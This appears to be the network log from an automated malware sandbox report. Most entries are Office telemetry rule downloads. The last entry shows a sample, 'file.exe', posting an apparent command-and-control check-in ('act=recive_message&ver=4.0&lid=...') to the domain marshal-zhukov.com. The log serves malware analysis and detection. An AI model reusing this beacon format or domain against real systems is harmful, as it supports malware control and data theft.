                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8e932a430b320f3f-EWR
                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1650&min_rtt=1631&rtt_var=650&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2847&recv_bytes=909&delivery_rate=1634023&cwnd=193&unsent_bytes=0&cid=5abd417d6d59ba8f&ts=2809&x=0"
                                                                                                                                                                                                                                                              2024-11-27 15:31:27 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 2ok
                                                                                                                                                                                                                                                              2024-11-27 15:31:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              8192.168.2.104971413.107.246.43443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:31:25 UTC192OUTGET /rules/rule120610v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                              2024-11-27 15:31:25 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:31:25 GMT
                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                              Content-Length: 474
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:46 GMT
                                                                                                                                                                                                                                                              ETag: "0x8DC582B9964B277"
                                                                                                                                                                                                                                                              x-ms-request-id: 8ccd6c39-f01e-0085-6e81-3f88ea000000
                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                              x-azure-ref: 20241127T153125Z-174f7845968g6hv8hC1EWR1v2n000000052g000000009myn
                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              2024-11-27 15:31:25 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120610" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              9192.168.2.104971613.107.246.43443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:31:25 UTC192OUTGET /rules/rule120611v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                              2024-11-27 15:31:25 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:31:25 GMT
                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                              Content-Length: 415
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:56 GMT
                                                                                                                                                                                                                                                              ETag: "0x8DC582B9F6F3512"
                                                                                                                                                                                                                                                              x-ms-request-id: f5d49257-301e-005d-758c-3fe448000000
                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                              x-azure-ref: 20241127T153125Z-174f7845968n2hr8hC1EWR9cag0000000wu0000000007su9
                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              2024-11-27 15:31:25 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4c 6c 5d 5b 45 65 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 56 76 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120611" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <SR T="2" R="([Ll][Ee][Nn][Oo][Vv][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              10192.168.2.104971713.107.246.43443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:31:25 UTC192OUTGET /rules/rule120612v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                              2024-11-27 15:31:25 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:31:25 GMT
                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                              Content-Length: 471
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:25 GMT
                                                                                                                                                                                                                                                              ETag: "0x8DC582BB10C598B"
                                                                                                                                                                                                                                                              x-ms-request-id: 5028e0c8-f01e-0003-0a78-404453000000
                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                              x-azure-ref: 20241127T153125Z-174f7845968jrjrxhC1EWRmmrs0000000xag0000000061ba
                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              2024-11-27 15:31:25 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120612" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              11192.168.2.104971813.107.246.43443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:31:25 UTC192OUTGET /rules/rule120613v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                              2024-11-27 15:31:25 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:31:25 GMT
                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                              Content-Length: 632
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                                                                                                                                              ETag: "0x8DC582BB6E3779E"
                                                                                                                                                                                                                                                              x-ms-request-id: 6f96f590-e01e-0099-0e7f-3fda8a000000
                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                              x-azure-ref: 20241127T153125Z-174f7845968xr5c2hC1EWRd0hn0000000dw000000000pma9
                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              2024-11-27 15:31:25 UTC632INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 48 68 5d 5b 50 70 5d 28 5b 5e 45 5d 7c 24 29 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 33 22 20 52 3d 22 28 5b 48 68 5d 5b 45 65 5d 5b 57 77 5d 5b 4c 6c 5d 5b 45 65 5d
                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120613" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <SR T="2" R="^([Hh][Pp]([^E]|$))"> <S T="1" F="1" M="Ignore" /> </SR> <SR T="3" R="([Hh][Ee][Ww][Ll][Ee]


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              12192.168.2.104972013.107.246.43443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:31:27 UTC192OUTGET /rules/rule120615v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                              2024-11-27 15:31:28 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:31:27 GMT
                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                              Content-Length: 407
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                                                                                                                                                                                                              ETag: "0x8DC582BBAD04B7B"
                                                                                                                                                                                                                                                              x-ms-request-id: ed9dfa2a-401e-0015-7891-3f0e8d000000
                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                              x-azure-ref: 20241127T153127Z-174f7845968n2hr8hC1EWR9cag0000000wsg00000000cwtz
                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              2024-11-27 15:31:28 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 53 73 5d 5b 55 75 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120615" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <SR T="2" R="([Aa][Ss][Uu][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              13192.168.2.104972213.107.246.43443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:31:27 UTC192OUTGET /rules/rule120617v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                              2024-11-27 15:31:28 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:31:27 GMT
                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                              Content-Length: 427
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:02 GMT
                                                                                                                                                                                                                                                              ETag: "0x8DC582BA310DA18"
                                                                                                                                                                                                                                                              x-ms-request-id: c665a67d-901e-002a-1b91-3f7a27000000
                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                              x-azure-ref: 20241127T153127Z-174f7845968kdththC1EWRzvxn00000009eg00000000erby
                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              2024-11-27 15:31:28 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120617" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo][Ss][Oo][Ff][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              14192.168.2.104972313.107.246.43443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:31:27 UTC192OUTGET /rules/rule120618v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                              2024-11-27 15:31:28 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:31:27 GMT
                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                              Content-Length: 486
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:30 GMT
                                                                                                                                                                                                                                                              ETag: "0x8DC582B9018290B"
                                                                                                                                                                                                                                                              x-ms-request-id: dc0e488f-901e-005b-3891-3f2005000000
                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                              x-azure-ref: 20241127T153127Z-174f7845968zgtf6hC1EWRqd8s0000000q0g00000000mw81
                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              2024-11-27 15:31:28 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120618" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              15192.168.2.104972113.107.246.43443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:31:27 UTC192OUTGET /rules/rule120616v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                              2024-11-27 15:31:28 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:31:28 GMT
                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                              Content-Length: 486
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                                                                                                                              ETag: "0x8DC582BB344914B"
                                                                                                                                                                                                                                                              x-ms-request-id: 6eac52fb-a01e-006f-2191-3f13cd000000
                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                              x-azure-ref: 20241127T153127Z-174f78459685726chC1EWRsnbg0000000x4000000000ka87
                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              2024-11-27 15:31:28 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120616" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              16192.168.2.1049724172.67.160.804438100C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:31:29 UTC266OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Content-Length: 52
                                                                                                                                                                                                                                                              Host: marshal-zhukov.com
                                                                                                                                                                                                                                                              2024-11-27 15:31:29 UTC52OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 69 63 26 6a 3d
                                                                                                                                                                                                                                                              Data Ascii: act=recive_message&ver=4.0&lid=LOGS11--LiveTrafic&j=
                                                                                                                                                                                                                                                              2024-11-27 15:31:31 UTC1036INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:31:31 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=athf43qngki4t1ld0d5kisradc; expires=Sun, 23-Mar-2025 09:18:09 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=28T5B6VaUyrsDMVyyc64yaBWsQz9j5BGWcan2jsOX6nMWHZhjez9kwc%2Bo9wo4GuH7xUmNGjnh0MPm8LZY35TWyFAwO0m6G9bstUM06aYts9lNthxcflqvEPJvYHzUCfHmXleGXI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8e932a5c8f6a7c99-EWR
                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=3911&min_rtt=1979&rtt_var=2097&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=954&delivery_rate=1475492&cwnd=229&unsent_bytes=0&cid=ace945643cc2a34d&ts=2288&x=0"
